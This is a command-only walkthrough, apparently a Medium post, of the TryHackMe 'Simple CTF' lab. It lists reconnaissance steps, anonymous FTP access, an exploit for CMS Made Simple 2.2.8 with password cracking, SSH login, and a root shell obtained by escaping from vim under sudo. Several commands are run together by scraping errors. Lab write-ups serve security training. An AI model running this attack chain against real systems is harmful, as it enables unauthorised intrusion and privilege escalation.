TryHackMe: Simple CTF

  1. Port scan
nmap -Pn <ip>
nmap -A -p 21,80,2222 <ip>
nmap --script vuln -p 21,80,2222 <ip>
ftp <ip>anonymous
lscd pub
ls
get ForMitch.txtexit
cat ForMitch.txt
http://<ip>/
http://<ip>/robots.txt
http://<ip>/openemr-5_0_1_3
dirb http://<ip>
http://<ip>/simple/
searchsploit cms made simple 2.2.8
searchsploit -m 46635
python 46635.py -u http://<ip>/simple/ --crack -w rockyou.txt
http://<ip>/simple/admin
ssh mitch@<ip> -p 2222
ls cat user.txt
sudo -l
sudo vim -c ':!/bin/sh'
cd /rootlscat root.txt

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store